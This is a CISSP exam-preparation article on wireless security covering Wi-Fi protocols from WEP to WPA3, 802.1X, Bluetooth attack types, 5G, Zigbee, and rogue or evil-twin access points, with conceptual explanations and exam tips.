Wireless networking has evolved from a convenience technology to the primary connectivity method for most endpoints in modern organisations. The CISSP exam tests wireless security across multiple technologies: the Wi-Fi security protocol evolution, Bluetooth vulnerabilities, 5G architecture changes, IoT wireless protocols, and the detection of wireless attacks. Each technology has distinct vulnerabilities and controls that the exam tests in scenario form.
WEP to WPA3: The Security Protocol Evolution
Understanding why each generation of Wi-Fi security was replaced is more important for the exam than memorising technical details. Each protocol's successor addressed the specific vulnerabilities that made its predecessor insecure.
Wired Equivalent Privacy (WEP) was introduced in 1997 as the first Wi-Fi security protocol. It used RC4 stream cipher with a 40-bit (later 104-bit) key combined with a 24-bit Initialization Vector (IV). WEP was fundamentally broken by 2001. The 24-bit IV was too short, causing IV reuse frequently (especially on busy networks). IV reuse allowed attackers to analyse multiple ciphertexts encrypted with the same keystream and recover the key using statistical attacks. Additionally, WEP used CRC-32 for integrity, which is not cryptographically secure — an attacker could modify packets and recalculate the CRC to match. WEP is completely broken and can be cracked in minutes with freely available tools. It should never be used.
Wi-Fi Protected Access (WPA) was introduced in 2003 as an interim improvement while the full 802.11i standard was developed. WPA used TKIP (Temporal Key Integrity Protocol) with RC4 — a significant improvement over WEP because TKIP generated a new key for each packet. WPA also added MIC (Message Integrity Code) to replace WEP's broken CRC. However, TKIP was eventually found vulnerable to attacks and WPA is now deprecated.
WPA2, introduced in 2004, implemented the full 802.11i standard. It replaced RC4/TKIP with AES-CCMP (Advanced Encryption Standard in Counter Mode with CBC-MAC Protocol), which is significantly more secure. WPA2 remained the standard for over a decade. WPA2-Personal (PSK) uses a pre-shared passphrase for authentication. WPA2-Enterprise uses 802.1X with RADIUS for individual user authentication — each user authenticates with their own credentials rather than a shared password. WPA2 is vulnerable to KRACK (Key Reinstallation Attack), disclosed in 2017, though KRACK primarily requires local network access and has largely been patched.
WPA3, introduced in 2018, addresses WPA2's key weaknesses. WPA3-Personal replaces PSK with SAE (Simultaneous Authentication of Equals, also called Dragonfly), a password authentication protocol that is resistant to offline dictionary attacks — even if an attacker captures the handshake, they cannot perform offline brute force. WPA3 also provides forward secrecy for personal networks. WPA3-Enterprise upgrades to 192-bit security mode (CNSA suite). Enhanced Open (OWE) provides encryption for open networks without requiring a password.
For the exam: WEP is broken (IV reuse, weak RC4). WPA used TKIP (improvement but deprecated). WPA2 uses AES-CCMP (strong but PSK vulnerable to offline attacks). WPA3 uses SAE (resistant to offline dictionary attacks). WPA2-Enterprise with 802.1X is preferred over WPA2-Personal (PSK) for enterprise environments.
802.1X: Enterprise Wireless Authentication
802.1X is a port-based network access control standard that provides authenticated access to networks. In wireless contexts, it is used with WPA2-Enterprise and WPA3-Enterprise to provide per-user authentication using RADIUS.
The 802.1X architecture has three components: the supplicant (the client device seeking access), the authenticator (the wireless access point), and the authentication server (RADIUS server). When a client connects, the AP acts as a pass-through for EAP (Extensible Authentication Protocol) messages between the client and the RADIUS server. The RADIUS server verifies the client's credentials (certificate, username/password, or other EAP method) and grants or denies access.
For the exam: 802.1X with RADIUS is the enterprise wireless authentication standard. It is preferred over PSK because each user authenticates individually — if one user's credentials are compromised, only that user's access is revoked, not the entire network's shared key.
Bluetooth Vulnerabilities
Bluetooth is a short-range wireless protocol used for device pairing. The exam tests three specific Bluetooth attack types.
Bluejacking is the sending of unsolicited messages to a Bluetooth device. It does not steal data — it sends data. The attacker uses the Bluetooth contact name field to send messages to discoverable Bluetooth devices in range. Bluejacking is a nuisance attack rather than a security breach.
Bluesnarfing is the unauthorised access to information on a Bluetooth device. An attacker exploits a vulnerability in the OBEX (OBject EXchange) protocol to access the target's contact list, calendar, emails, text messages, and other data without the device owner's knowledge or consent. Bluesnarfing is a genuine security attack that can result in data theft.
Bluebugging is a more sophisticated attack that gives the attacker full control over the target device's Bluetooth functions, including making phone calls, sending text messages, and accessing data. Bluebugging typically requires the device to be in discoverable mode and exploits vulnerabilities in the Bluetooth firmware.
For the exam: Bluejacking sends messages (nuisance). Bluesnarfing steals data. Bluebugging provides device control. All three require the attacker to be within Bluetooth range (typically 10-100 metres).
5G Security Architecture vs 4G LTE
5G introduces significant changes to mobile network security compared to 4G LTE. The CISSP exam expects awareness of the key security improvements and new concerns.
Security improvements in 5G: stronger authentication (5G uses the 5G-AKA protocol with improved protection against IMSI catchers), more comprehensive encryption (encryption is applied earlier in the connection setup process compared to 4G), network slicing security (5G supports multiple logical network slices, each with its own security policies), and improved subscriber identity protection (the SUPI — Subscription Permanent Identifier — is encrypted in 5G, unlike the IMSI in 4G which could be captured by IMSI catchers/Stingrays).
New 5G security concerns: expanded attack surface (5G's reliance on software-defined networking and virtualised network functions increases exposure to software vulnerabilities), supply chain risk (concerns about components from specific vendors with potential nation-state connections), and IoT proliferation (5G's massive machine type communications capability enables billions of IoT devices, many of which will have minimal security).
Zigbee and IoT Wireless Protocol Risks
Zigbee is a low-power wireless protocol designed for IoT devices. It operates in the 2.4 GHz band (same as Wi-Fi and Bluetooth) and uses mesh networking. Common applications include smart home devices, industrial sensors, and medical devices.
Zigbee security concerns: the protocol supports AES-128 encryption, but many implementations use weak or default keys. Zigbee networks can be vulnerable to key extraction attacks on devices, replay attacks, and denial of service through channel jamming. The low-power constraint of many Zigbee devices limits the cryptographic operations they can perform.
For the exam: IoT wireless protocols like Zigbee prioritise power efficiency over security. Proper IoT security requires network segmentation, firmware updates, and replacing default keys.
Rogue Access Points and Evil Twin Attacks
A rogue access point is an unauthorised wireless AP connected to the corporate network — typically installed by an employee for convenience without IT approval. Rogue APs bypass wireless security controls and can provide unauthorised network access.
An evil twin attack deploys an attacker-controlled AP with the same SSID as a legitimate network. Devices may automatically connect to the evil twin (especially if it has a stronger signal), allowing the attacker to intercept all wireless traffic. This is a man-in-the-middle attack at the wireless layer.
Detection: wireless intrusion detection/prevention systems (WIDS/WIPS) scan for unauthorised APs and can automatically contain (de-authenticate clients from) rogue and evil twin APs.
Exam Tip
WPA2-Enterprise with 802.1X is preferred over WPA2-Personal (PSK) for enterprise environments. PSK is a shared secret — if one person knows it, everyone on that network is potentially exposed. 802.1X provides per-user authentication with individual accountability. For Bluetooth: bluejacking is harmless (sends messages), bluesnarfing steals data, bluebugging gives full control. WPA3-SAE is resistant to offline dictionary attacks that defeat WPA2-PSK.
// PRACTICE_THIS_DOMAIN
Test your knowledge on Communication and Network Security
AI-generated practice questions mapped to this domain. Get instant explanations and track your progress.